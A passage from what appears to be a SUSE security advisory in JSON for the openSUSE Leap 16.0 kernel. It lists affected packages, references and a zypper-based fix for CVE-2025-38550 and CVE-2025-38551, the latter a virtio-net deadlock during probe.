"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38550"
},
{
"cve": "CVE-2025-38551",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38551"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix recursived rtnl_lock() during probe()\n\nThe deadlock appears in a stack trace like:\n\n virtnet_probe()\n rtnl_lock()\n virtio_config_changed_work()\n netdev_notify_peers()\n rtnl_lock()\n\nIt happens if the VMM sends a VIRTIO_NET_S_ANNOUNCE request while the\nvirtio-net driver is still probing.\n\nThe config_work in probe() will get scheduled until virtnet_open() enables\nthe config change notification via virtio_config_driver_enable().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38551",
"url": "https://www.suse.com/security/cve/CVE-2025-38551"
},
{
"category": "external",
"summary": "SUSE Bug 1248234 for CVE-2025-38551",
"url": "https://bugzilla.suse.com/1248234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
